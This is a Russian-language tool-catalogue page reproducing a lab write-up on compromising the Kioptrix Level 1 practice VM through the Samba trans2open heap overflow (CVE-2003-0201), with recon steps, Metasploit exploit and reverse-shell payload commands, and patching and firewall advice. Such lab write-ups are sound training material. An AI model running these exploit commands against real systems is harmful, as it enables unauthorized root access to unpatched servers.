Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Kioptrix-Level1-Vulnerability-Analysis — Технический аудит Kioptrix Level 1. Основное внимание: эксплуатация Samba 2.2.1a (CVE-2003-0201), ручное перечисление и укрепление внутренней инфраструктуры. | Kitploit
Инструменты/GitHubGitHub/deepakkcybersec-eng/kioptrix-level1-vulnerability-analysis
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubdeepakkcybersec-eng/kioptrix-level1-vulnerability-analysis

Kioptrix-Level1-Vulnerability-Analysis

Технический аудит Kioptrix Level 1. Основное внимание: эксплуатация Samba 2.2.1a (CVE-2003-0201), ручное перечисление и укрепление внутренней инфраструктуры.

Репозиторий
7 месяцев назадЕщё не проверено

Kioptrix Level 1: Полноспектральный аудит уязвимостей и эксплуатация

🏛️ Профессиональная цель

Целью было выполнить структурированное тестирование на проникновение в среде Kioptrix Level 1 для достижения полного компрометации 'root' и документирования технических стратегий устранения, подходящих как для операций Red, так и Blue team.

🏗️ Воспроизведение среды (Аппаратные особенности)

Современные настройки виртуализации по умолчанию часто не работают на устаревших ядрах 2010 года. Для успешной загрузки и настройки сети этой машины потребовались следующие специфические архитектурные конфигурации:

  • Подтип ОС: Linux / Red Hat (32-бит).
  • Архитектура хранения: Переключено с SATA на IDE Controller для поддержки устаревшего .vmdk жесткого диска.
  • Сетевой протокол: Настроен как PCI FAST-III с адаптером Host-only для обеспечения внутренней связи с атакующей машиной Kali Linux.

⚔️ Анализ атак (Путь Red Team)

Эксплуатация следовала жизненному циклу от ручной разведки до эксплуатации:

1. Обнаружение и разведка

  • Netdiscover: Использован netdiscover -r 192.168.184.4 для определения IP-адреса цели.
  • Сканирование Nmap: Обнаружены службы, включая SSH (22), HTTP (80), RPC (111) и NetBIOS-SSN (139). Samba 2.2.1a была отмечена как основная точка входа.

2. Эксплуатация (Samba trans2open)

  • Уязвимость: CVE-2003-0201 (Переполнение кучи).
  • Сопоставление MITRE ATT&CK: - Тактика: Повышение привилегий (TA0004)
    • Техника: Эксплуатация для повышения привилегий (T1068)
  • Протокол Metasploit:
    • use exploit/linux/samba/trans2open
    • set RHOSTS 192.168.114.5
    • set payload linux/x86/shell/reverse_tcp
  • Результат: Успешно запущена обратная оболочка. Команда whoami вернула root.

🛡️ Защитное устранение (Путь Blue Team)

Для защиты корпоративной среды обязательны следующие стратегии управления уязвимостями (VM):

  • Протокол обновления: Обновите Samba до последней поддерживаемой версии (Samba 4.x). Уязвимость в функции call_trans2open эффективно устранена во всех современных версиях.
  • Укрепление сети: Разверните межсетевые экраны на узлах, чтобы ограничить порты 139 и 445 только доверенными внутренними подсетями.
  • Стратегия роли VM: Это устранение попадает под стандартные циклы управления уязвимостями в рабочее время, обеспечивая стабильность инфраструктуры.

📝 Технические доказательства и ручные журналы

Следующие изображения документируют живую ручную разведку и выполнение в терминале:

Обнаружение цели и архитектурные заметки

Manual Notes 1

Логика команд Metasploit и конфигурация полезной нагрузки

Manual Notes 2

Доказательство root-доступа (снимок терминала)

Root Shell Evidence

Скачать инструмент